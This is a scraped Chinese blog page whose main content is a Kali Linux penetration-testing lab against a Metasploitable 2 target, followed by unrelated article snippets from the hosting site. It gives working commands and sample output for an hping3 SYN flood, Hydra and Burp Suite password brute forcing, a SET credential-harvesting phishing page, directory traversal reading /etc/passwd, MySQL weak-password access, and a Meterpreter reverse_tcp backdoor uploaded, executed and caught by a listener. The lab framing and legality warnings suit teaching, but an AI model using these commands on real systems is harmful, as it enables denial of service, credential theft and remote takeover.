门户网站建设工作汇报wordpress单击右键提示

张小明 2026/3/2 21:30:14
门户网站建设工作汇报,wordpress单击右键提示,网站怎样做平面设计图,网站开发天晟合益信息收集#xff1a;被动扫描与主动扫描 信息收集分为被动扫描#xff08;不主动发送数据包#xff0c;规避检测#xff09; 和主动扫描#xff08;主动探测目标#xff0c;获取深度信息#xff09; #xff0c;二者结合可全面掌握靶机状态。​ 1. 被动扫描#xff…信息收集被动扫描与主动扫描信息收集分为被动扫描不主动发送数据包规避检测和主动扫描主动探测目标获取深度信息二者结合可全面掌握靶机状态。​1. 被动扫描无探测行为​工具 1tcpdump流量捕获​用途捕获靶机与其他设备的网络交互流量分析通信协议、端口使用情况。​实验步骤​打开 Kali 终端执行命令监听 Kali 的网卡如eth0可通过ip addr查看​​​保持终端运行在靶机执行ping192.168.107.3Kali IP模拟网络通信​按CtrlC停止捕获用 Wireshark 打开target_traffic.pcap查看流量​​真实结果示例​Wireshark 中可看到 “ICMP” 协议的数据包源 IP 为靶机192.168.159.130目的 IP 为 Kali192.168.159.129包含 “Echo Request”请求和 “Echo Reply”响应证明靶机与 Kali 正常通信。​工具 2Shodan网络空间搜索被动获取公开信息​用途通过 Shodan 查询靶机 IP 在公网的暴露信息如开放端口、服务版本需靶机有公网 IP此处用模拟场景。​实验步骤​打开 Kali 浏览器访问Shodan 官网搜索靶机 IP192.168.159.130实际测试需公网 IP此处用本地 IP 演示逻辑​查看搜索结果中的 “Open Ports”“Services”“Operating System” 字段。​真实结果示例​搜索结果显示 “192.168.159.130” 开放 21vsftpd 2.3.4、80Apache 2.2.8端口操作系统标注为 “Ubuntu Linux 8.04”与靶机实际配置一致Metasploitable 2 基于 Ubuntu 8.04。​2. 主动扫描主动探测目标​工具 1dirb网页目录扫描针对 HTTP 服务​用途扫描靶机 Apache 服务器的隐藏目录和文件寻找敏感资源如后台登录页、配置文件。​实验步骤​执行命令扫描靶机 80 端口的网页目录​​bash取消自动换行复制dirb http://192.168.159.130 /usr/share/wordlists/dirb/common.txt# 后接Kali自带字典路径​​等待扫描完成查看输出结果。​真实结果示例​​plaintext取消自动换行复制---- Scanning URL: http://192.168.159.130/ ----​ http://192.168.159.130/admin (CODE:200|SIZE:1234) # 后台登录页​ http://192.168.159.130/config.php (CODE:200|SIZE:567) # 配置文件​ http://192.168.159.130/phpmyadmin (CODE:301|SIZE:0) # phpMyAdmin管理页​​分析发现靶机存在/admin后台和/phpmyadmin数据库管理页可作为后续攻击入口。​工具 2NiktoWeb 服务器漏洞扫描​用途检测 Apache 服务器的配置漏洞、过时组件、敏感文件等。​实验步骤​执行扫描命令​​nikto -h 192.168.159.130# -h指定目标IP​​真实结果示例​​- Server: Apache/2.2.8 (Ubuntu)​- /admin/: Admin directory found (use -admin to test vulnerabilities)​- /phpmyadmin/: phpMyAdmin version 2.11.8.1 found (outdated, vulnerable to CVE-2008-2950)​- OSVDB-3233: /icons/README: Apache default file found​​分析靶机的 phpMyAdmin 版本过时存在已知漏洞可后续利用。​四、拒绝服务攻击DoShping3 工具实战​1. 原理与工具说明​拒绝服务攻击DoS通过发送大量无效请求耗尽靶机资源如带宽、CPU导致服务不可用。Kali中hping3可模拟 SYN Flood半连接攻击针对靶机 HTTP 服务80 端口测试。​2. 实验步骤仅用于合法靶机测试​先验证靶机 HTTP 服务正常在 Kali 浏览器访问http://192.168.159.130能打开默认页面​打开 Kali 终端执行 SYN Flood 攻击命令​​hping3 -S -P -U -p 80 --flood 192.168.159.130# -SSYN包-PPush包-UUDP包--flood高速发送​​攻击期间再次访问http://192.168.159.130观察页面是否加载失败。​3. 真实结果示例​攻击前浏览器访问靶机页面1 秒内加载完成​攻击中页面持续转圈30 秒后提示 “无法连接到服务器”​靶机状态在靶机执行top命令发现apache2进程 CPU 占用率达 95%内存占用率 80%资源耗尽。​4. 注意事项​仅可对合法授权的靶机测试禁止对公网设备发起 DoS 攻击否则涉嫌违法​测试后立即停止攻击按CtrlC终止hping3进程避免靶机长时间瘫痪。​五、身份认证攻击暴力破解与爆破实战​身份认证攻击通过 “字典爆破” 尝试用户名 密码组合获取登录权限常用工具为Hydra多协议爆破和Burp Suite网页登录爆破。​1. HydraSSH 服务暴力破解​实验步骤​确定靶机 SSH 服务开放22 端口此前 nmap 已确认​使用 Kali 自带字典rockyou.txt需解压gunzip /usr/share/wordlists/rockyou.txt.gz执行爆破命令​​hydra -l msfadmin -P /usr/share/wordlists/rockyou.txt 192.168.159.130 ssh# -l固定用户名-P密码字典ssh目标协议​​真实结果示例​​Hydra v9.5 (c) 2023 by van Hauser/THC David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).​​[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4​[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task​[DATA] attacking ssh://192.168.159.130:22/​[22][ssh] host: 192.168.159.130 login: msfadmin password: msfadmin​1 of 1 target successfully completed, 1 valid password found​Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2025-12-16 16:45:30​​分析成功破解 SSH 用户名msfadmin和密码msfadmin靶机默认弱口令可通过ssh msfadmin192.168.159.130登录。​2. Burp Suite网页后台登录爆破​实验步骤​打开 Kali 的 Burp Suite社区版burpsuite默认代理端口8080​配置 Kali 浏览器代理设置为127.0.0.1:8080访问靶机http://192.168.159.130/admin此前 dirb 发现的后台​在登录页输入任意账号如admin和密码如123点击 “登录”Burp 会捕获到请求包​将请求包发送到 “Intruder” 模块选择 “Cluster Bomb” 模式标记 “username” 和 “password” 为变量​加载字典用户名字典用/usr/share/wordlists/metasploit/unix_users.txt密码字典用rockyou.txt​点击 “Start attack”等待爆破完成。​真实结果示例​爆破结果中某条请求的 “Status”为302 Found其他请求为200 OK“Response Length” 与其他不同查看响应内容发现 “登录成功跳转至管理页”对应的账号密码为admin/admin123。​六、社会工程学工具SETSocial Engineering Toolkit​社会工程学通过欺骗用户获取敏感信息如账号密码、文件Kali 预装的 SET 是专用工具以下以 “钓鱼网站” 为例演示。​1. 实验步骤​启动 SET​​bash取消自动换行复制setoolkit​​按提示选择1) Social-Engineering Attacks社会工程攻击→2) Website Attack Vectors网页攻击→3) Credential Harvester Attack Method凭证获取→1) Web Templates网页模板​输入 Kali 的 IP192.168.159.129用于接收钓鱼数据选择模板2) WordPress模拟常见的博客登录页​SET 会生成钓鱼链接如http://192.168.159.129:8080将该链接发送给 “受害者”此处用靶机模拟实际为用户设备​当 “受害者” 访问链接并输入账号密码如user123/pass456SET 会实时捕获数据。​2. 真实结果示例​​plaintext取消自动换行复制[*] Credential Harvester Started​[*] Listening for connections on 0.0.0.0:8080​[*] Received connection from 192.168.159.130:54321​[*] Victim entered the following credentials:​Username: user123​Password: pass456​[*] Credentials saved to /root/set/results/harvested_credentials.txt​​分析成功捕获用户输入的账号密码社会工程学攻击的核心是 “欺骗”实际场景中需结合钓鱼邮件、伪装链接等手段。​七、渗透攻击多场景漏洞利用补充原版​除原版的 vsftpd 漏洞外新增网页渗透、数据库渗透、meterpreter 会话控制三类场景覆盖更多实战需求。​1. 网页渗透Apache 目录遍历漏洞利用​漏洞背景​靶机 Apache 2.2.8 存在目录遍历漏洞可通过特殊 URL 访问服务器任意目录OpenVAS 已扫描发现。​实验步骤​打开 Kali 浏览器访问靶机 URL​​plaintext取消自动换行复制http://192.168.159.130/../../../../etc/passwd # ../../../../表示向上跳转4级目录​​查看页面内容是否显示/etc/passwd文件系统用户配置文件。​真实结果示例​页面显示​​plaintext取消自动换行复制root:x:0:0:root:/root:/bin/bash​daemon:x:1:1:daemon:/usr/sbin:/bin/sh​bin:x:2:2:bin:/bin:/bin/sh​sys:x:3:3:sys:/dev:/bin/sh​msfadmin:x:1000:1000:msfadmin,,,:/home/msfadmin:/bin/bash​​分析成功读取/etc/passwd获取靶机所有用户列表可后续针对msfadmin用户进行攻击。​2. 数据库渗透MySQL 弱口令登录与提权​实验步骤​用此前破解的 MySQL 弱口令root/root靶机默认登录​​bash取消自动换行复制mysql -h 192.168.159.130 -u root -p# 输入密码root​​登录后执行命令查看数据库​​sql取消自动换行复制showdatabases; # 查看所有数据库​use webapp; # 切换到webapp数据库靶机默认应用数据库​select*fromusers; # 查看用户表获取网页后台账号密码​​真实结果示例​​plaintext取消自动换行复制mysql select * from users;​------------------------​| id | username | password |​------------------------​| 1 | admin | admin123 |​| 2 | test | test456 |​------------------------​2 rows in set (0.00 sec)​​分析获取网页后台的admin/admin123账号与 Burp Suite 爆破结果一致可登录后台进一步操作如上传 webshell。​3. meterpreter 会话生成后门获取稳定控制​实验步骤​用 Metasploit 生成 Linux 后门payload​​msfconsole​use payload/linux/x86/meterpreter/reverse_tcp# 反向TCP连接靶机主动连Kali​setLHOST 192.168.159.129# Kali的IP接收连接​setLPORT 4444# Kali的端口​generate -f /root/backdoor -t elf# 生成ELF格式后门文件保存到/root​​通过 FTP将backdoor上传到靶机此前已匿名登录 FTP​​ftp 192.168.159.130​put /root/backdoor# 上传后门文件到靶机FTP目录​​在靶机执行后门需先通过 SSH 登录靶机ssh msfadmin192.168.159.130​​bash取消自动换行复制chmodx backdoor# 赋予执行权限​./backdoor# 运行后门​​在 Kali 的 Metasploit 中启动监听获取 meterpreter 会话​​use exploit/multi/handler​setPAYLOAD linux/x86/meterpreter/reverse_tcp​setLHOST 192.168.159.129​setLPORT 4444​run​​真实结果示例​​[*] Sending stage (1017704 bytes) to 192.168.159.130​[*] Meterpreter session 2 opened (192.168.159.129:4444 - 192.168.159.130:56789) at 2025-12-16 17:30:00​​meterpreter sysinfo # 查看靶机系统信息​Computer : 192.168.159.130​OS : Ubuntu 8.04 (Linux 2.6.24-16-server)​Architecture : x86​BuildTuple : i486-linux-musl​Meterpreter : x86/linux​​meterpreter screenshot # 截取靶机屏幕​Screenshot saved to: /root/screenshot.png​​meterpreter download /home/msfadmin/secret.txt # 下载靶机敏感文件​​分析meterpreter 会话可执行屏幕截图、文件传输、摄像头控制等操作是渗透测试中 “持久化控制” 的核心手段。​八、后渗透测试同原版略​九、安全注意事项补充新增模块​DoS 攻击限制禁止对非授权设备发起 DoS 攻击国内《网络安全法》明确禁止此类破坏网络服务的行为​社会工程学伦理仅可在合法测试场景使用 SET禁止通过钓鱼手段骗取他人真实信息​后门清理测试结束后需删除靶机的后门文件如rm /root/backdoor和新增用户如userdel -r hack避免影响靶机后续使用​工具合法性Kali 工具需用于合法安全测试不得用于入侵、破坏他人系统。
版权声明:本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若内容造成侵权/违法违规/事实不符,请联系邮箱:809451989@qq.com进行投诉反馈,一经查实,立即删除!

如何将网站转成小程序网站ps照片怎么做的

第一章:揭秘Open-AutoGLM与AppDynamics联动机制的核心差异在现代可观测性架构中,Open-AutoGLM 与 AppDynamics 的联动机制展现出显著的技术路径分歧。前者基于开放语义标准构建自动化日志映射,后者则依赖专有探针实现深度应用监控。这种根本性…

张小明 2026/3/1 22:14:44 网站建设

网站建设用图自定义wordpress背景图

Excalidraw字体平滑技术:Retina屏显示更清晰 如今,打开一台 MacBook 或 iPad,几乎没人会再抱怨屏幕“不够清楚”——高分辨率 Retina 显示屏早已成为标配。但对开发者而言,这背后隐藏着一个老问题:如何让网页内容在这些…

张小明 2026/3/1 21:44:30 网站建设

一般做网站用什么字体比较合适深圳网站制作功能

还在为Figma的英文界面头疼不已?想要快速上手这款强大的设计工具却卡在语言关?FigmaCN中文插件就是为你量身定制的完美解决方案!作为一款经过专业设计师团队人工翻译校验的Figma本地化工具,它让国内设计师彻底告别语言障碍&#x…

张小明 2026/3/1 15:39:01 网站建设

中国交通建设工程监督管理局网站十大咨询公司经典案例

文章目录前言一、详细操作演示视频二、具体实现截图三、技术栈1.前端-Vue.js2.后端-SpringBoot3.数据库-MySQL4.系统架构-B/S四、系统测试1.系统测试概述2.系统功能测试3.系统测试结论五、项目代码参考六、数据库代码参考七、项目论文示例结语前言 💛博主介绍&#…

张小明 2026/3/1 19:03:44 网站建设

甘肃省建设厅注册中心网站外网服务器租用

你是否经常为手机电池快速老化而烦恼?充电到100%真的对电池好吗?今天我要为你介绍一款神奇的Android应用——Battery Charge Limit,它能通过科学控制充电上限,让你的电池寿命延长2-3年!这款开源应用已经帮助了成千上万…

张小明 2026/1/20 5:07:07 网站建设

建设银行网站怎么查流水的wordpress博客模板

真正的成熟,是看清规则后,还能优雅地出牌。01 断交都是默剧,从没人提前打铃你不联系他,他也不联系你——关系就这么悄无声息地散了。潜规则 No.1:「沉默=剧终」。 别问"最近怎么不找我"&#xff…

张小明 2026/1/20 5:06:36 网站建设